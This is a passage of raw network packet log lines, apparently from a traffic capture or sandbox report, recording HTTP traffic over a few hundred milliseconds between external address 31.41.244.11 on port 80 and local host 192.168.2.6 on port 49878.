                                                                                                                                                              Dec 18, 2024 11:47:49.296506882 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.296525955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.296569109 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.297602892 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.297620058 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.297652960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.297669888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.298610926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.298629045 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.298662901 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.298681974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.299748898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.299766064 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.299808979 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.299830914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.300781012 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.300798893 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.300844908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.302010059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.302026033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.302061081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.302078009 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.302953005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.302969933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.303004026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.303019047 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.304157019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.304172993 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.304208040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.304225922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.305329084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.305346966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.305375099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.305389881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.306901932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.306920052 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.306950092 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.306967974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.307861090 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.307877064 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.307907104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.308850050 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.308911085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.309040070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.309091091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.310331106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.310348034 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.310379028 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.310400963 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.312328100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.312347889 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.312386036 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.312407970 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.313693047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.313708067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.313741922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.314372063 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.314385891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.314433098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.315274954 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.315290928 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.315325975 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.316168070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.316184998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.316266060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.317056894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.317070961 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.317114115 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.318341017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.318357944 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.318394899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.318418026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.319421053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.319434881 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.319468975 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.320689917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.320708036 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.320736885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.320760012 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.321733952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.321751118 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.321800947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.323117971 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.323131084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.323168039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.324184895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.324229956 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.324726105 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.324773073 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.325572968 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.325587034 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.325619936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.326375008 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.326416016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.326643944 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.327091932 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.327651978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.327666998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.327693939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.327708960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.328773975 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.328789949 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.328836918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.329952955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.329966068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.330017090 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.331588984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.331605911 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.331654072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.331672907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.332786083 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.332811117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.332973003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.333499908 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.333513021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.333553076 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.333575010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.334897995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.334913969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.334943056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.334956884 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.336195946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.336210966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.336236954 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.336256981 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.337568045 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.337585926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.337709904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.338783026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.338797092 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.338840008 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.338857889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.339934111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.339950085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.340017080 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.340842962 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.340857983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.340895891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.340918064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.471215963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.471282959 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.471729994 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.471745968 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.471757889 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.471791983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.471813917 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.472740889 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.472784042 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.473608017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.473642111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.473651886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.473679066 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.474359989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.474488974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.475152016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.475167036 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.475193977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.475207090 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.475974083 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.476020098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.476862907 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.477040052 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.477665901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.477679014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.477746964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.477746964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.478382111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.478435040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.478806973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.478852034 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.479824066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.479835987 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.479876041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.479897976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.480926037 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.480937958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.480978012 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.480990887 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.481967926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.481980085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.482019901 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.483144045 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.483156919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.483195066 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.483208895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.484338999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.484350920 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.484385967 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.484399080 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.485313892 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.485363007 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.486361980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.486779928 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.486793041 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.486805916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.486821890 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.486833096 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.487684965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.487698078 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.487719059 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.487744093 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.488831043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.488883972 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.489841938 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.490358114 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.490365028 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.490397930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.490434885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.490456104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.491833925 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.491846085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.491878033 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.491889000 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.492688894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.492702961 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.492732048 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.492744923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.493676901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.493689060 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.493736029 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.493736029 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.494806051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.494820118 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.494841099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.494867086 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.496414900 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.496433020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.496500015 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.496500969 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.498367071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.498384953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.498399019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.498471975 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.499511003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.499530077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.499541998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.499577999 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.499603987 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.501868010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.501887083 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.501899958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.501924992 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.501939058 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.502366066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.502882957 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.505040884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.505057096 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.505072117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.505084038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.505103111 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.505130053 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.506362915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.506381035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.506406069 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.506433964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.507184982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.507200956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.507241011 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.507705927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.507749081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.508569956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.508690119 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.509216070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.509233952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.509268045 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.509283066 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.510354996 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.510371923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.510392904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.510411978 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.511393070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.511409044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.511441946 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.511459112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.512495041 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.512511015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.512547970 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.512563944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.513468027 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.513483047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.513520002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.513537884 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.514888048 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.514904022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.514949083 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.514966965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.516021013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.516037941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.516089916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.516979933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.516998053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.517040968 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.518126965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.518141985 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.518188953 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.519273043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.519288063 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.519332886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.520525932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.520566940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.520596027 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.520613909 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.521616936 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.521632910 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.521667957 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.521678925 CET4987880192.168.2.631.41.244.11
